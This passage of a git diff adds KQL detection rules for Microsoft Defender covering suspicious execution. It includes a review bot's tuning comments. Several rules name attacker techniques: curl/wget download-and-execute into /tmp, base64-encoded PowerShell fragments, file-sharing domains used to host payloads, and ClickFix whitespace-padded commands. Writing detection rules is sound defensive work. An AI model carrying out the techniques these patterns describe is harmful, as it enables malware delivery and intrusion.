+// Date: 2019-04-02
+// Level: high
+// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
+
+DeviceProcessEvents
+| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql
new file mode 100644
index 00000000..8a34bb30
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: high
+// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
new file mode 100644
index 00000000..92c83621
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Deno File Written from Remote Source
+// Author: Josh Nickels, Michael Taggart
+// Date: 2025-05-22
+// Level: low
+// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.
+This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate usage of deno to request a file or bring a DLL to a host
+
+DeviceFileEvents
+| where (FolderPath contains "\\deno\\gen\\" or FolderPath contains "\\deno\\remote\\https\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
new file mode 100644
index 00000000..2d79b7c4
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
@@ -0,0 +1,17 @@
+// Title: Suspicious Download and Execute Pattern via Curl/Wget
+// Author: Aayush Gupta
+// Date: 2025-06-17
+// Level: high
+// Description: Detects suspicious use of command-line tools such as curl or wget to download remote
+content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
+immediate execution, indicating potential malicious activity. This pattern is commonly used
+by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.t1203
+// False Positives:
+// - System update scripts using temporary files
+// - Installer scripts or automated provisioning tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/curl" or ProcessCommandLine contains "/wget") and ProcessCommandLine contains "sh -c" and (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/dev/shm/")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
new file mode 100644
index 00000000..ef5c9fd1
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Electron Application Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
new file mode 100644
index 00000000..f2ef91d2
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
+// Author: pH-T (Nextron Systems)
+// Date: 2022-03-01
+// Level: high
+// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql
new file mode 100644
index 00000000..46581024
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Encoded PowerShell Command Line
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
+// Date: 2018-09-03
+// Level: high
+// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql
new file mode 100644
index 00000000..1fe5f0c2
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution Location Of Wermgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-14
+// Level: high
+// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql
new file mode 100644
index 00000000..e1d5ccdf
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Powershell with Base64
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Commandline to launch powershell with a base64 payload
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding ")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
new file mode 100644
index 00000000..ed3f28b8
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. +ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar. +The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents +| where (ProcessCommandLine contains "#" and FolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file 
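Review bot: The twelve `ProcessCommandLine contains "            "` clauses on the where line appear identical in this patch view; if the converter normalised the distinct Unicode space characters of the source rule (en/em/ideographic spaces and similar) to plain ASCII, the rule has collapsed to a single ASCII-run check and no longer detects the Unicode padding the description says it targets, so the emitted bytes should be checked with a hex view before this is merged. If they are distinct, a comment such as `// Each literal below is a run of a different Unicode space character (U+2000-U+200A, U+3000, ...); do not normalise` would protect them from the next editor. The two description continuation lines in this hunk also lack the `//` prefix, as raised on the wmic reconnaissance hunk.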
diff --git a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql
new file mode 100644
index 00000000..498abae2
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Characteristics Due to Missing Fields
+// Author: Markus Neis, Sander Wiebing
+// Date: 2018-11-22
+// Level: medium
+// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql
new file mode 100644
index 00000000..c8d27aee
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql
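Review bot: The `=~ "?"` comparisons on the where line carry over Sysmon's placeholder for an absent version-info field, but DeviceProcessEvents leaves the ProcessVersionInfo* columns empty when the PE has no such resource, so as written the rule is unlikely to ever match on this data source. Replacing each test with an emptiness check restores the intent: `| where ((isempty(ProcessVersionInfoFileDescription) and isempty(ProcessVersionInfoProductVersion)) or (isempty(ProcessVersionInfoFileDescription) and isempty(ProcessVersionInfoProductName)) or (isempty(ProcessVersionInfoCompanyName) and isempty(ProcessVersionInfoFileDescription))) and FolderPath contains "\\Downloads\\"`. Worth confirming against a sample of py2exe-style binaries in the tenant, since the exact representation of missing fields is inferred rather than visible here.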
@@ -0,0 +1,12 @@
+// Title: Suspicious File Created In PerfLogs
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
new file mode 100644
index 00000000..61e252ec
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains 
"ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
new file mode 100644
index 00000000..d47202af
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
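Review bot: The thirty-entry domain list and the extension list are pasted verbatim into this rule and into suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql, so the two will drift the first time one of them is tuned. Declaring each list once at the top of the file as `let FileSharingDomains = dynamic([...]);` and testing with `ProcessCommandLine has_any (FileSharingDomains)` makes the list reviewable as data; the caveat is that `has_any` is term-based rather than substring-based, so an entry such as ".githubusercontent.com" would have to lose its leading dot. If strict substring matching is required, the `contains` chain is the correct form and the duplication is the cost.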
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine 
contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql
new file mode 100644
index 00000000..1bfaf062
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") 
and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql
new file mode 100644
index 00000000..a1aa333b
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql
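Review bot: The `://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}` regex matches any dotted quad, loopback and RFC 1918 ranges included, so internal deployment scripts that pull an installer from an intranet host will trip a high-severity rule. If that proves noisy, the address can be pulled out and filtered with `| extend DstIp = extract(@"://([0-9]{1,3}(\.[0-9]{1,3}){3})", 1, ProcessCommandLine)` followed by `| where not(ipv4_is_private(DstIp))`. The same regex is used by suspicious_file_download_from_ip_via_wget_exe.kql and its _paths variant in the following hunks, so any tuning should be applied to all three together.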
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file 
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql
new file mode 100644
index 00000000..d11c2d3e
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Wget.EXE - Paths
